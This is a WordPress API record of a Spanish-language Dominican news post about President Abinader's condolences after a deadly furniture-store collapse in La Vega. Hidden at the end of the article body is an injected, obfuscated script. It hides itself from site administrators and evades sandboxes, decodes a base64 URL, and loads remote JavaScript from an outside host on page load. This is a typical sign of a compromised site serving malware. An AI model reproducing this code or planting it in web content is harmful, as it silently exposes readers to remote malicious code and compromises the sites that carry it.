{"id":13473,"date":"2023-01-19T11:53:46","date_gmt":"2023-01-19T15:53:46","guid":{"rendered":"https:\/\/yanessiespinal.com\/?p=13473"},"modified":"2023-01-19T11:53:46","modified_gmt":"2023-01-19T15:53:46","slug":"presidente-abinader-envia-condolencias-a-familiares-de-joven-muerta-en-derrumbe-en-la-vega","status":"publish","type":"post","link":"https:\/\/enterarterd.com\/?p=13473","title":{"rendered":"Presidente Abinader env\u00eda condolencias a familiares de joven muerta en derrumbe en La Vega"},"content":{"rendered":"<p>El presidente de la Rep\u00fablica, Luis Abinader, expres\u00f3 sus condolencias a los familiares de Yasiris Joaqu\u00edn de Jes\u00fas, quien falleci\u00f3 en el derrumbe \u00a0que ocurri\u00f3 ayer en la tienda Multimuebles en la ciudad de La Vega.<\/p>\n<p>\u00abQuiero expresar mis condolencias a los familiares de Yasiris Joaqu\u00edn de Jes\u00fas, quien lamentablemente falleci\u00f3 a pesar del gran esfuerzo realizado por los organismos de socorro para rescatarla con vida tras el derrumbe de una tienda de muebles ayer en La Vega. \u00a1Paz a su alma!\u00bb, escribi\u00f3 en su cuenta de Twitter.<\/p>\n<p>La confirmaci\u00f3n de su muerte fue dada a conocer por el general del Cuerpo de Bomberos de La Vega, C\u00e9sar Abreu.<\/p>\n<p>El general Abreu explic\u00f3 que Joaqu\u00edn, quien se encontraba en el primer nivel, muri\u00f3 al caerle las tres losas de concreto del edificio. Esto le habr\u00eda provocado la muerte instant\u00e1neamente.<\/p>\n<p>Yasiris Joaqu\u00edn era empleada de la muebler\u00eda, y se hab\u00eda incorporado hace poco de su licencia postmaterna.<\/p>\n<p>&nbsp;<\/p>\n<p>El desplome del inmueble de cuatro pisos, ubicado en la calle Las Carreras, Esquina S\u00e1nchez, se ocurri\u00f3 al mediod\u00eda de este mi\u00e9rcoles.<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>El presidente de la Rep\u00fablica, Luis Abinader, expres\u00f3 sus condolencias a los familiares de Yasiris Joaqu\u00edn de Jes\u00fas, quien falleci\u00f3 en el derrumbe \u00a0que ocurri\u00f3 ayer en la tienda Multimuebles en la ciudad de La Vega. \u00abQuiero expresar mis condolencias a los familiares de Yasiris Joaqu\u00edn de Jes\u00fas, quien lamentablemente falleci\u00f3 a pesar del gran [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":13475,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-13473","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacionales"},"_links":{"self":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13473","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13473"}],"version-history":[{"count":0,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13473\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/media\/13475"}],"wp:attachment":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13473"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13473"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13473"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}